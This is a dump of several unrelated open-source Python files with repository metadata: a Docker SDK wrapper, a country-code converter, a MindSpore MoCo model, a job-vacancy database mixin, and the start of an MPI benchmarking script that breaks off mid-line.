Exception as e:\n logger.error(\"Create bridge network failed: {}\".format(e))\n return False\n else:\n return True\n\n def create_overlay_network(\n self, name, subnet, iprange, gateway, opt_name\n ):\n try:\n pool_config = self.get_ipam_pool(\n subnet, iprange, gateway, aux_addresses=None\n )\n ipam_config = self.get_ipam_config(\n driver=\"default\", pool_configs=[pool_config], options={}\n )\n overlay = self.create(\n name=name, driver=\"overlay\", ipam=ipam_config,\n check_duplicate=True, internal=False, attachable=True,\n ingress=False, enable_ipv6=False, scope=\"swarm\",\n options={\n \"com.docker.network.bridge.name\": opt_name\n },\n labels={},\n )\n except Exception as e:\n logger.error(\"Create bridge network failed: {}\".format(e))\n return False\n else:\n return True\n\n def prune(self, filters=None):\n try:\n networks = self.networks.prune(filters)\n except Exception as e:\n logger.error(\"Docker Network prune failed: {}\".format(e))\n raise e\n else:\n # return dict\n return networks\n\n def delete(self, names=None, ids=None, filters=None, greedy=False):\n try:\n nets = self.networks.list(\n names=names, ids=ids, filters=filters, greedy=greedy\n )\n for net in nets:\n for container in net.containers:\n logger.debug(\n \"Disconnect {} from {}\".format(\n container.name, net.name)\n )\n net.disconnect(container.name, force=True)\n logger.debug(\n \"Remove docker network {}:{}\".format(net.id, net.name)\n )\n net.remove()\n except Exception as e:\n logger.error(\"Docker Network delete failed: {}\".format(e))\n return False\n else:\n return True\n\n def delete_gwbridge(self):\n \"\"\"\n for docker swarm.\n\n ingress network attached to docker_gwbridge cause docker_gwbridge not easy to be removed.\n :return:\n \"\"\"\n try:\n nets = self.networks.list([\"docker_gwbridge\"])\n if len(nets) == 1:\n net = nets[0]\n try:\n net.disconnect(\"gateway_ingress-sbox\", force=True)\n except Exception:\n logger.error(\"disconnect gateway_ingress-sbox from docker_gwbridge failed, skip...\")\n net.remove()\n else:\n logger.debug(\"docker_gwbridge not exist.\")\n except Exception as e:\n logger.error(\"Delete docker_gwbridge failed: {}\".format(e))\n raise e\n else:\n return True\n\n def list(self, names=None, ids=None, filters=None, greedy=False):\n try:\n nets = self.networks.list(\n names=names, ids=ids, filters=filters, greedy=greedy\n )\n except Exception as e:\n logger.error(\"Docker Network list failed: {}\".format(e))\n raise e\n else:\n return nets\n\n\nclass BaseImages(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.images = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.images = self.client.images\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def load(self, data):\n try:\n images = self.images.load(data)\n except Exception as e:\n logger.error(\"Docker Image load failed: {}\".format(e))\n raise e\n else:\n # return list of Images\n return images\n\n def list(self, name=None, all=False, filters=None):\n try:\n images = self.images.list(name, all, filters)\n except Exception as e:\n logger.error(\"Docker Image list failed: {}\".format(e))\n raise e\n else:\n # return list\n return images\n\n def pull(self, repo=None, tag=None, auth_config=None, platform=None):\n try:\n images = self.images.pull(repo, tag, auth_config, platform)\n except Exception as e:\n logger.error(\"Docker Image pull failed: {}\".format(e))\n raise e\n else:\n return images\n\n def push(self, repo, tag=None, stream=True, auth_config=None, decode=True):\n try:\n for line in self.images.push(\n repo, tag, stream, auth_config, decode\n ):\n logger.debug(line)\n except Exception as e:\n logger.error(\"Docker Image push failed: {}\".format(e))\n raise e\n\n def prune(self, dangling=True):\n \"\"\"\n prune images.\n :param dangling: bool\n :return: dict\n True means only delete untagged images.\n False means delete all unused images.\n \"\"\"\n try:\n images = self.images.prune({\"dangling\": dangling})\n except Exception as e:\n logger.error(\"Docker Image prune failed: {}\".format(e))\n raise e\n else:\n # return dict\n return images\n\n def remove(\n self, image=None, force=False, noprune=False\n ):\n try:\n self.images.remove(image, force, noprune)\n except Exception as e:\n logger.error(\"Docker Image remove failed: {}\".format(e))\n raise e\n\n def delete_all(self):\n try:\n for image in self.list(all=True):\n self.images.remove(image.id)\n except Exception as e:\n logger.error(\"Docker Image delete failed: {}\".format(e))\n raise e\n\n @staticmethod\n def create_time(image):\n try:\n return image.attrs[\"Created\"]\n except Exception as e:\n logger.error(\"Get Image Create time failed: {}\".format(e))\n raise e\n\n\nclass BaseVolumes(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.volumes = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.volumes = self.client.volumes\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def prune(self):\n try:\n volumes = self.volumes.prune(filters=None)\n except Exception as e:\n logger.error(\"Docker Volumes prune failed: {}\".format(e))\n raise e\n else:\n # return dict\n return volumes\n\n\nclass BaseContainers(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.containers = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.containers = self.client.containers\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def list(\n self, all=False, since=None, before=None, limit=None,\n filters=None, sparse=False, ignore_removed=False\n ):\n \"\"\"\n :param all: False to show running containers.\n :param since:\n :param before:\n :param limit:\n :param filters:\n :param sparse: True to not inspect containers.\n :param ignore_removed: False to not ignore removed containers.\n :return:\n \"\"\"\n try:\n containers = self.containers.list(\n all, since, before, limit, filters, sparse, ignore_removed\n )\n except Exception as e:\n logger.error(\"Docker Containers list failed: {}\".format(e))\n raise e\n else:\n names = [\n (one.id, one.name, one.image)\n for one in containers\n ]\n logger.debug(\"containers: {}\".format(names))\n return containers\n\n def prune(self):\n try:\n containers = self.containers.prune(filters=None)\n except Exception as e:\n logger.error(\"Docker Containers prune failed: {}\".format(e))\n raise e\n else:\n # return dict\n return containers\n\n def delete_all(self):\n try:\n for container in self.list(all=True):\n logger.debug(\"delete container: {}\".format(container.name))\n container.stop()\n container.remove()\n except Exception as e:\n logger.error(\n \"Docker Container delete(stop/remove) failed: {}\".format(e)\n )\n raise e\n\n\nclass BaseServices(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.services = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.services = self.client.services\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def list(self, filters=None):\n try:\n services = self.services.list(filters=filters)\n except Exception as e:\n logger.error(\"Docker Service list failed: {}\".format(e))\n raise e\n else:\n # return list\n names = [\n one.name\n for one in services\n ]\n logger.debug(\"services: {}\".format(names))\n return services\n\n def delete_all(self):\n try:\n for service in self.list():\n logger.debug(\"delete service: {}\".format(service.name))\n service.remove()\n except Exception as e:\n logger.error(\n \"Docker Service delete(stop/remove) failed: {}\".format(e)\n )\n raise e\n\n def force_update_all(self):\n try:\n for service in self.list():\n logger.debug(\"force update service: {}\".format(service.name))\n service.force_update()\n except Exception as e:\n logger.error(\"Docker service force update failed: {}\".format(e))\n raise e\n\n\nclass BaseNodes(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.nodes = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.nodes = self.client.nodes\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def list(self, filters=None):\n try:\n nodes = self.nodes.list(filters=filters)\n except Exception as e:\n logger.error(\"Docker Node list failed: {}\".format(e))\n raise e\n else:\n # return list\n return nodes\n\n @staticmethod\n def node_ip(node):\n try:\n ip = node.attrs[\"Status\"][\"Addr\"]\n except Exception as e:\n logger.error(\"Get node ip address failed: {}\".format(e))\n raise e\n else:\n # return string\n return ip\n\n\nclass BasePlugin(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.plugins = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.plugins = self.client.plugins\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def list(self):\n try:\n plugins = self.plugins.list()\n except Exception as e:\n logger.error(\"Failed to list all plugins {}\".format(e))\n raise e\n else:\n logger.debug(\"plugins: {}\".format(plugins))\n return plugins\n\n def install(self, remote, local=None, enable=True):\n try:\n remote = remote if len(remote.split(\":\")) == 2 else remote + \":latest\"\n if not local:\n local = remote\n else:\n local = local if len(local.split(\":\")) == 2 else local + \":latest\"\n for p in self.list():\n if p.name == local:\n logger.debug(\"plugin already installed.\")\n plugin = p\n break\n else:\n plugin = self.plugins.install(remote, local)\n if not plugin.enabled:\n logger.debug(\"plugin disabled.\")\n if enable:\n plugin.enable()\n else:\n logger.debug(\"plugin enabled.\")\n if not enable:\n plugin.disable()\n except Exception as e:\n logger.error(\"Install plugin {} failed: {}\".format(remote, e))\n return False\n else:\n return True\n\n def remote(self, name, force=False):\n try:\n for plugin in self.list():\n if plugin.name == name:\n plugin.remove(force=force)\n except Exception as e:\n logger.error(\"Remove plugin {} failed: {}\".format(name, e))\n return False\n else:\n return True\n\n\nclass BaseConfigs(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.configs = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.configs = self.client.configs\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n\nclass BaseSecrets(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.secrets = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.secrets = self.client.secrets\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n\n\n","repo_name":"crazy-canux/super-devops","sub_path":"super_devops/container/docker_wrapper.py","file_name":"docker_wrapper.py","file_ext":"py","file_size_in_byte":27250,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"74275036142","text":"import csv\nimport os\nimport re\n\ntry:\n import polars as pl\nexcept ImportError:\n pl = None\ntry:\n import pandas as pd\nexcept ImportError:\n pd = None\n\npkg_dir, pkg_filename = os.path.split(__file__)\ndata_path = os.path.join(pkg_dir, \"data\", \"codelist.csv\")\n\nwith open(data_path) as f:\n rows = csv.reader(f)\n codelist = {col[0]: list(col[1:]) for col in zip(*rows)}\n\n\ndef countrycode(sourcevar=[\"DZA\", \"CAN\"], origin=\"iso3c\", destination=\"country.name.en\"):\n \"\"\"\n Convert country codes or names from one format to another.\n\n This function takes a list, string, or Polars Series of country codes or names, and converts them to the desired\n format, such as ISO 3-letter codes, country names in different languages, etc.\n\n Parameters:\n sourcevar (list, str, or polars.series.series.Series, optional):\n A list, string, or Polars Series of country codes or names to be converted. Default is ['DZA', 'CAN'].\n origin (str, optional):\n The format of the input country codes or names. Default is 'iso3c'.\n destination (str, optional):\n The desired format of the output country codes or names. Default is 'country.name.en'.\n\n Returns:\n list, str, or polars.series.series.Series:\n The converted country codes or names in the desired format. The output type depends on the input type:\n - If `sourcevar` is a string or int, returns a string.\n - If `sourcevar` is a list, returns a list.\n - If `sourcevar` is a Polars Series, returns a Polars Series.\n\n Raises:\n ValueError:\n If the `origin` or `destination` format is not one of the supported formats.\n If the input `sourcevar` is not a string, list, or Polars Series.\n\n Example:\n >>> countrycode(['DZA', 'CAN'], origin='iso3c', destination='country.name.en')\n ['Algeria', 'Canada']\n\n Note:\n This function uses two helper functions (`replace_regex` and `replace_exact`) to perform the actual conversion.\n \"\"\"\n\n # user convenience shortcuts\n if origin == \"country.name\":\n origin = \"country.name.en.regex\"\n\n if origin in [\"country.name.en\", \"country.name.fr\", \"country.name.de\", \"country.name.it\"]:\n origin = origin + \".regex\"\n\n if destination == \"country.name\":\n destination = \"country.name.en\"\n\n if destination not in codelist.keys():\n raise ValueError(\"destination must be one of: \" + \"\".join(codelist.columns))\n\n valid = [\n \"cctld\",\n \"country.name\",\n \"country.name.de\",\n \"country.name.fr\",\n \"country.name.it\",\n \"cowc\",\n \"cown\",\n \"dhs\",\n \"ecb\",\n \"eurostat\",\n \"fao\",\n \"fips\",\n \"gaul\",\n \"genc2c\",\n \"genc3c\",\n \"genc3n\",\n \"gwc\",\n \"gwn\",\n \"imf\",\n \"ioc\",\n \"iso2c\",\n \"iso3c\",\n \"iso3n\",\n \"p5c\",\n \"p5n\",\n \"p4c\",\n \"p4n\",\n \"un\",\n \"un_m49\",\n \"unicode.symbol\",\n \"unhcr\",\n \"unpd\",\n \"vdem\",\n \"wb\",\n \"wb_api2c\",\n \"wb_api3c\",\n \"wvs\",\n \"country.name.en.regex\",\n \"country.name.de.regex\",\n \"country.name.fr.regex\",\n \"country.name.it.regex\",\n ]\n if origin not in valid:\n raise ValueError(\"origin must be one of: \" + \", \".join(valid))\n\n sourcevar_series = sourcevar\n if pl:\n if isinstance(sourcevar, pl.series.series.Series):\n sourcevar_series = sourcevar.to_list()\n if pd:\n if isinstance(sourcevar, pd.Series):\n sourcevar_series = sourcevar.to_list()\n if isinstance(sourcevar, str):\n sourcevar_series = [sourcevar]\n\n # conversion\n if origin in [\n \"country.name.en.regex\",\n \"country.name.fr.regex\",\n \"country.name.de.regex\",\n \"country.name.it.regex\",\n ]:\n out = replace_regex(sourcevar_series, origin, destination)\n else:\n out = replace_exact(sourcevar_series, origin, destination)\n\n # output type\n if isinstance(sourcevar, str) | isinstance(sourcevar, int):\n return out[0]\n elif pl and isinstance(sourcevar, pl.series.series.Series):\n return pl.Series(out)\n elif pd and isinstance(sourcevar, pd.Series):\n return pd.Series(out)\n else:\n return out\n\n\ndef get_first_match(pattern, string_list):\n for string in string_list:\n match = pattern.search(string)\n if match:\n return match.group()\n return None\n\n\ndef replace_exact(sourcevar, origin, destination):\n out = []\n for string in sourcevar:\n match_found = False\n for position, origin_i in enumerate(codelist[origin]):\n if origin_i == \"\" or codelist[destination][position] == \"\":\n continue\n if string == origin_i:\n if codelist[destination][position].isdigit():\n out.append(int(codelist[destination][position]))\n else:\n out.append(codelist[destination][position])\n match_found = True\n break\n if not match_found:\n out.append(None)\n return out\n\n\ndef replace_regex(sourcevar, origin, destination):\n sourcevar_unique = list(set(sourcevar))\n o = []\n d = []\n for i, (val_origin, val_destination) in enumerate(zip(codelist[origin], codelist[destination])):\n if val_origin != \"\" and val_destination != \"\":\n o.append(re.compile(val_origin, flags=re.IGNORECASE))\n d.append(val_destination)\n\n result = []\n for string in sourcevar_unique:\n match_found = False\n for position, regex in enumerate(o):\n if re.search(regex, string):\n result.append(d[position])\n match_found = True\n break\n if not match_found:\n result.append(None)\n mapping = dict(zip(sourcevar_unique, result))\n out = [int(mapping[i]) if mapping[i] and mapping[i].isdigit() else mapping[i] for i in sourcevar]\n return out\n","repo_name":"vincentarelbundock/pycountrycode","sub_path":"countrycode/countrycode.py","file_name":"countrycode.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"42154602325","text":"# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"MoCo model.\"\"\"\n\nimport mindspore\nfrom mindspore import Tensor\nimport mindspore.nn as nn\nimport mindspore.ops as ops\n\nfrom model.resnet_util import ResNet18, BasicBlock\n\n\nclass ModelMoCo(nn.Cell):\n \"\"\"MoCo model based on ResNet18.\"\"\"\n def __init__(self, i=4096, m=0.01, t=0.1, symmetric=True):\n super(ModelMoCo, self).__init__()\n\n self.i = i\n self.m = m\n self.t = t\n self.symmetric = symmetric\n\n # create the encoders\n self.encoder_q = ResNet18(BasicBlock, [2, 2, 2, 2], 128)\n self.encoder_k = ResNet18(BasicBlock, [2, 2, 2, 2], 128)\n\n for param_q, param_k in zip(self.encoder_q.trainable_params(), self.encoder_k.trainable_params()):\n param_k = param_q.clone()\n param_k.requires_grad = False\n\n self.queue = mindspore.Parameter(ops.Zeros()((128, 4096), mindspore.float32), name=\"queue\", requires_grad=False)\n self.queue = ops.L2Normalize(axis=0)(self.queue)\n self.queue_ptr = mindspore.Parameter(ops.Zeros()(1, mindspore.float32), name=\"queue_ptr\", requires_grad=False)\n\n def _momentum_update_key_encoder(self):\n \"\"\"Momentum update of the key encoder.\"\"\"\n for param_q, param_k in zip(self.encoder_q.trainable_params(),\n self.encoder_k.trainable_params()):\n param_k.set_data(param_k.data * (1 - self.m) + param_q.data * self.m)\n\n def _dequeue_and_enqueue(self, keys):\n \"\"\"encoding and decoding function.\"\"\"\n batch_size = keys.shape[0]\n\n ptr = int(self.queue_ptr)\n\n self.queue[:, ptr:ptr + batch_size] = keys.T\n ptr = (ptr + batch_size) % self.i\n\n self.queue_ptr[0] = ptr\n\n @staticmethod\n def _batch_shuffle_single_gpu(x):\n \"\"\"batch shuffle is used for multi gpu simulation.\"\"\"\n\n # random shuffle index\n n_x = Tensor([x.shape[0]], dtype=mindspore.int32)\n randperm = ops.Randperm(max_length=x.shape[0], pad=-1)\n idx_shuffle = randperm(n_x)\n n_2 = ops.Cast()(idx_shuffle, mindspore.float32)\n\n # index for restoring\n idx_unshuffle_2 = ops.Sort()(n_2)\n idx_unshuffle = idx_unshuffle_2[1]\n\n return x[idx_shuffle], idx_unshuffle\n\n @staticmethod\n def _batch_unshuffle_single_gpu(x, idx_unshuffle):\n \"\"\"Undo batch shuffle is used for multi gpu simulation.\"\"\"\n\n return x[idx_unshuffle]\n\n def infonce_loss(self, im_q, im_k):\n \"\"\"InfoNCE loss function.\"\"\"\n # compute query features\n q = self.encoder_q(im_q)\n q = ops.L2Normalize(axis=1)(q)\n\n # compute key features\n im_k_, idx_unshuffle = ModelMoCo._batch_shuffle_single_gpu(im_k)\n\n k = self.encoder_k(im_k_)\n k = ops.L2Normalize(axis=1)(k)\n\n # undo shuffle\n k = ModelMoCo._batch_unshuffle_single_gpu(k, idx_unshuffle)\n k = ops.stop_gradient(k)\n\n einsum0 = ops.ReduceSum()(q * k, -1)\n l_pos = ops.ExpandDims()(einsum0, -1)\n\n # negative logits: NxK\n l_neg = ops.MatMul()(q, self.queue)\n\n # logits: Nx(1+K)\n logits = ops.Concat(axis=1)((l_pos, l_neg))\n logits_n = ops.Cast()(logits, mindspore.float32)\n\n # apply temperature\n logits_x = logits_n / self.t\n\n # labels: positive key indicators\n labels_n = ops.Zeros()((logits.shape[0]), mindspore.int32)\n labels = ops.Cast()(labels_n, mindspore.int32)\n\n # Calculate the infonce loss\n loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')(logits_x, labels)\n k = ops.stop_gradient(k)\n loss = ops.stop_gradient(loss)\n\n return loss, k\n\n def construct(self, im1, im2):\n \"\"\"\n Input:\n im_q: a batch of query images\n im_k: a batch of key images\n Output:\n loss\n \"\"\"\n self._momentum_update_key_encoder()\n\n # compute loss\n if self.symmetric:\n loss_12, k2 = self.infonce_loss(im1, im2)\n loss_21, k1 = self.infonce_loss(im2, im1)\n loss = loss_12 + loss_21\n k = ops.Concat(axis=0)(k1, k2)\n else:\n loss, k = self.infonce_loss(im1, im2)\n self._dequeue_and_enqueue(k)\n\n return loss\n","repo_name":"mindspore-courses/applications","sub_path":"MoCo/src/model/moco.py","file_name":"moco.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"34901940159","text":"from typing import List\nfrom sqlalchemy import select, Enum\nfrom ..models import Vacancy, Audience\nfrom ..types import DAOVacancyData, WorkScheduleEnum, EmploymentEnum, AudienceEnum\nfrom geopy.distance import geodesic as GD\nfrom operator import attrgetter\n\n\nclass DAOVacancyMixin:\n sql_manager = None\n\n async def get_vacancy_by_id(self, vacancy_id: int) -> DAOVacancyData:\n \"\"\"\n Возвращает 1 вкансию по ее id\n :param vacancy_id:\n :return:\n \"\"\"\n await self.sql_manager.create_async_session()\n async with self.sql_manager.async_session() as session:\n async with session.begin():\n stmt = select(Vacancy).where(Vacancy.id == vacancy_id).where(\n Vacancy.deleted_at is not None)\n result = await session.scalars(stmt)\n tmp = result.first()\n if tmp:\n vacancy = tmp\n\n vacancy_data = DAOVacancyData(\n employer_id=vacancy.employer_id,\n audience_id=vacancy.audience_id,\n name=vacancy.name,\n work_schedule=vacancy.work_schedule,\n employment=vacancy.employment,\n salary=vacancy.salary,\n geolocation=vacancy.geolocation,\n is_open=vacancy.is_open,\n date_start=vacancy.date_start,\n date_end=vacancy.date_end\n )\n vacancy_data.id = vacancy.id\n return vacancy_data\n\n async def get_vacancy_by_geolocation(self, longitude: float = None, latitude: float = None) -> List[DAOVacancyData]:\n \"\"\"\n возвращает список вакансий, по широте и долготе\n в определенном радиусе (можно в конфиг пробросить и вытаскивать потом из него)\n произвести сортировку вакансий по возрастанию расстояния от соискателя - первым делом показываем самые ближние\n\n запилить датакласс под широту и долготу? и под вакансии тож надо бы\n\n :param longitude:\n :param latitude:\n :return:\n \"\"\"\n vacancies_list = []\n await self.sql_manager.create_async_session()\n async with self.sql_manager.async_session() as session:\n async with session.begin():\n stmt = select(Vacancy).where(Vacancy.deleted_at is not None)\n vacancies = await session.scalars(stmt)\n\n for vacancy in vacancies.unique():\n vacancy_data = DAOVacancyData(\n employer_id=vacancy.employer_id,\n audience_id=vacancy.audience_id,\n name=vacancy.name,\n work_schedule=vacancy.work_schedule,\n employment=vacancy.employment,\n salary=vacancy.salary,\n geolocation=vacancy.geolocation,\n is_open=vacancy.is_open,\n date_start=vacancy.date_start,\n date_end=vacancy.date_end,\n )\n\n if longitude and latitude:\n candidate_geolocation = f\"{longitude}, {latitude}\"\n vacancy_geolocation = vacancy.geolocation\n distance_from_candidate_to_vacancy = GD(candidate_geolocation, vacancy_geolocation).km\n vacancy_data.distance_from_candidate_to_vacancy = distance_from_candidate_to_vacancy\n vacancy_data.id = vacancy.id\n vacancies_list.append(vacancy_data)\n\n if longitude and latitude:\n vacancies_list = sorted(vacancies_list, key=attrgetter(\"distance_from_candidate_to_vacancy\"))\n\n return vacancies_list\n # заглушка\n # vacancy_data = [\n # {\n # \"id\": \"1\",\n # \"name\": \"сетевой инженер\",\n # \"work_schedule\": WorkScheduleEnum.remote.value,\n # \"employment\": EmploymentEnum.full_time.value,\n # \"salary\": 150_000.50,\n # },\n # {\n # \"id\": \"2\",\n # \"name\": \"грузчик\",\n # \"work_schedule\": WorkScheduleEnum.flexible.value,\n # \"employment\": EmploymentEnum.internship.value,\n # \"salary\": 15_000.75,\n # },\n # {\n # \"id\": \"3\",\n # \"name\": \"админ\",\n # \"work_schedule\": WorkScheduleEnum.flexible.value,\n # \"employment\": EmploymentEnum.internship.value,\n # \"salary\": 15_000.75,\n # },\n # {\n # \"id\": \"4\",\n # \"name\": \"разраб\",\n # \"work_schedule\": WorkScheduleEnum.flexible.value,\n # \"employment\": EmploymentEnum.internship.value,\n # \"salary\": 15_000.75,\n # },\n # {\n # \"id\": \"5\",\n # \"name\": \"страдатель фигней\",\n # \"work_schedule\": WorkScheduleEnum.flexible.value,\n # \"employment\": EmploymentEnum.internship.value,\n # \"salary\": 15_000.75,\n # },\n # {\n # \"id\": \"6\",\n # \"name\": \"отпускник\",\n # \"work_schedule\": WorkScheduleEnum.flexible.value,\n # \"employment\": EmploymentEnum.internship.value,\n # \"salary\": 15_000.75,\n # },\n # {\n # \"id\": \"7\",\n # \"name\": \"еще грузчик\",\n # \"work_schedule\": WorkScheduleEnum.flexible.value,\n # \"employment\": EmploymentEnum.internship.value,\n # \"salary\": 15_000.75,\n # },\n # ]\n # return vacancy_data\n\n async def insert_vacancy(self, vacancy: DAOVacancyData) -> None:\n\n await self.sql_manager.create_async_session()\n async with self.sql_manager.async_session() as session:\n async with session.begin():\n stmt = select(Vacancy).filter_by(**vacancy.__dict__)\n result = await session.scalar(stmt)\n\n if not result:\n session.add(Vacancy(**vacancy.__dict__))\n session.commit()\n\n async def get_audience_id_by_name(self, name: AudienceEnum) -> int:\n await self.sql_manager.create_async_session()\n async with self.sql_manager.async_session() as session:\n async with session.begin():\n audience = await session.scalar(select(Audience).filter_by(name=name))\n return audience.id\n","repo_name":"Polovnevya/GBDEV1","sub_path":"db/mixins/vacancy.py","file_name":"vacancy.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"12718502766","text":"#!/usr/bin/python3\n\nimport getopt, sys\nimport re\nimport os\nimport subprocess\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfasta_file = '../allChromosomes_pretty.fa'\n\nseq = {\n 'program_name': './sequence-translator',\n 'time_tokens': ['Final reading time:', 'Final computation time:', 'Final writing time:', 'Final total time:']\n}\n\n# OPT for Optimized, uses both MPI and OMP\nopt = {\n 'program_name': 'sequence-translatorOPT',\n 'time_tokens': ['Final reading time:', 'Final computation time:', 'Final writing time:', 'Final total time:']\n}\n\ndef plot_multi(data, cols=None, spacing=.1, **kwargs):\n\n from pandas import plotting\n\n # Get default color style from pandas - can be changed to any other color list\n if cols is None: cols = data.columns\n if len(cols) == 0: return\n colors = ['red', 'green', 'blue']\n\n # First axis\n ax = data.loc[:, cols[0]].plot(kind='scatter', label=cols[0], color=colors[0], **kwargs)\n ax.set_ylabel(ylabel=cols[0])\n lines, labels = ax.get_legend_handles_labels()\n\n for n in range(1, len(cols)):\n # Multiple y-axes\n ax_new = ax.twinx()\n ax_new.spines['right'].set_position(('axes', 1 + spacing * (n - 1)))\n data.loc[:, cols[n]].plot(kind='scatter', ax=ax_new, label=cols[n], color=colors[n % len(colors)], **kwargs)\n ax_new.set_ylabel(ylabel=cols[n])\n ax_new.set_ylim([0, data.loc[:, cols[n]].max()])\n\n # Proper legend position\n line, label = ax_new.get_legend_handles_labels()\n lines += line\n labels += label\n\n ax.legend(lines, labels, loc=0)\n ax.set_xlabel(\"Iteration\")\n return ax\n\n# [program] Dict\ndef collect_data(program, cores, multi=False):\n thread_mean_dicts = []\n\n exec_args = [program['program_name'], fasta_file, '../out.fa']\n # Launch across multiple machines if multi\n if multi:\n exec_args = ['mpirun', '-np', str(cores), '--hostfile', 'h2', '--mca', 'btl_tcp_if_include', 'eno1'] + exec_args\n else:\n exec_args = ['mpirun', '-np', str(cores)] + exec_args\n\n \n #for threads in range(1, 9):\n # print(\"Threads:\", threads)\n # os.environ['OMP_NUM_THREADS'] = str(threads)\n \n results = []\n for i in range(3): \n print(exec_args)\n output = subprocess.run(exec_args, capture_output=True).stdout.decode('utf-8')\n print(\"OUTPUT\", output)\n\n times = [] # Each elem is one time per exec\n for token in program['time_tokens']:\n print('Searching for', '(<=' + token + 